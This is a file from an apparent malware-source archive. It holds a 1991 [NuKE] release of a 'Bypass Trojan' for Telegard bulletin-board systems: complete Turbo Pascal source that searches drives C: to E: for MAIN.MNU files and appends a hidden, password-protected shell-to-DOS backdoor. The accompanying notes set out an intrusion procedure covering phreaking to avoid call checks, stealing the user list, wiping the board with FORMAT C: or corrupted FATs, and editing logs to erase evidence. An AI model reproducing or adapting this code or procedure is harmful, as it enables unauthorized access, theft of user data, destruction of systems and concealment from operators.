MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.bypass.asm
2021-01-12 17:34:47 -06:00

221 lines
9.6 KiB
NASM
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Bypass Trojan v1.0 and v2.0 :
Created by: Mechanix
Released : October 1991
Introduction:
Well this is basically another backdoor creator for Telegard Systems. This
one is relatively fullproof except for the fact that it requires REMOTE.BAT to
exist on the target system, or it will not function properly. However, the
Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the
target system, if it doesn't exist already. This is why I am also releasing
the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the
source after the description.
Description:
This trojan will scan all directories on drives C: to E: in search of the
MAIN.MNU file. Then it will append a few lines to the file as to create a
hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is
Read-Only or Hidden, and will remove these attributes long enough to make the
changes. It will also check for write-protection. The source can also be
changed as to modify any of the .MNU files.
Notes:
This trojan uses a basic Turbo Pascal cycle to scan all directories and
files, and thus the source can be modified for a number of uses. As for a good
procedure to nail the board once the shell to DOS command has been
implemented, I recommend the following:
- First and foremost, use a PBX or other phreaking trick to avoid the
annoying Maestro phone.
- Call preferably around 4-5 am, when the SysOp is almost sure not to be
around.
- Use the shuttle password (if there is one) and then apply as a NEW user
after you have bypassed the shuttle password. This will usually bypass CBV
utilities.
- Shell to DOS in the correct menu.
- Turn your capture mode on, as to record everything you see.
- Go get the user list and ZIP it up with another ZIP file that is already
online. This way you can D/L it later when you log on again. Or capture it
through a text file viewing utility if you find one on the system.
- If you don't want the user list, and just want to crash the board, then
FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if
it's a H/P board, use one of the online virii or trojans to screw him. That
will teach him, and you get to test them out.
- If you decide to only take the user list and let the board live, then go
edit the logs as to remove all evidence of your actions. If there's a spool
to printer log, you're in trouble.
- If you could not bypass CBV, then find that utility's log and edit out
your number.
- Lastly, take off the DOS shell command from the menu you modified in the
first place, unless you want to use it again, but this is risky.
Well that's the method I've been using, but the choice is your's.
Source:
PROGRAM BYPASS1;
{ Bypass Trojan v1.0 }
{ Created by: Hï!X [NuKE] }
{ Created on: 27/09/91 }
USES DOS;
VAR
Target : SEARCHREC;
T : TEXT;
PROCEDURE DIRECT (PATH : STRING);
VAR
PATH2 : STRING;
INFO : SEARCHREC;
INFO2 : SEARCHREC;
F : TEXT;
BEGIN
Findfirst (PATH + '\*.*',$10,INFO);
WHILE DOSERROR = 0 DO
BEGIN
IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN
Begin
PATH2 := PATH + '\' + INFO.NAME;
Chdir (PATH2);
Findfirst ('MAIN.MNU',($3F - $10),INFO2); { Or any .MNU you wish }
WHILE DOSERROR = 0 DO
Begin
ASSIGN (F,INFO2.NAME);
Setfattr (F,$20);
Append (F);
Writeln (F,' ');
Writeln (F,' ');
Writeln (F,'#'); { Key to add }
Writeln (F,' ');
Writeln (F,'-$');
Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password }
Writeln (F,' ');
Writeln (F,' ');
Writeln (F,' ');
Writeln (F,'#'); { Key to add }
Writeln (F,' ');
Writeln (F,'D-');
Writeln (F,'REMOTE.BAT');
Close (F);
Findnext(INFO2);
End;
DIRECT (PATH2);
End;
Findnext(INFO);
End;
END;
PROCEDURE FILEFIND (DRIVE : CHAR);
BEGIN
Chdir (DRIVE + ':\');
Findfirst ('MAIN.MNU',($3F - $10),Target); { Or any .MNU you wish }
WHILE DOSERROR = 0 DO
Begin
ASSIGN (T,Target.name);
Setfattr (T,$20);
{$I-}
Append (T);
{$I+}
IF IORESULT = 0 THEN
Begin
Writeln (T,' ');
Writeln (T,'#'); { Key to add }
Writeln (T,' ');
Writeln (T,'-$');
Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password }
Writeln (T,' ');
Writeln (T,' ');
Writeln (T,' ');
Writeln (T,'#'); { Key to add }
Writeln (T,' ');
Writeln (T,'D-');
Writeln (T,'REMOTE.BAT');
Close (T);
End
ELSE
Exit;
Findnext (Target);
End;
DIRECT (DRIVE + ':');
END;
BEGIN
{$I-}
Chdir ('C:\');
{$I+}
IF IORESULT = 0 THEN
FILEFIND ('C');
{$I-}
Chdir ('D:\');
{$I+}
IF IORESULT = 0 THEN
FILEFIND ('D');
{$I-}
Chdir ('E:\');
{$I+}
IF IORESULT = 0 THEN
FILEFIND ('E');
END.
Well there it is. Please feel free to improve it in anyway you like. I will
soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and
creates one if needed. The REMOTE.BAT file also has the Hidden attribute to
try and hide it from the SysOp. The reason for this, is that smart SysOps, and
any of those who are reading this, rename the REMOTE.BAT or remove it, to
avoid this sort of trojan. The original release is for a modem on Com2. If you
wish to have the trojan for another device, either edit it in the .EXE, or
contact me (Mechanix) on any [NuKE] board, and I will recompile the source for
you with another device.
Mechanix [NuKE]
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;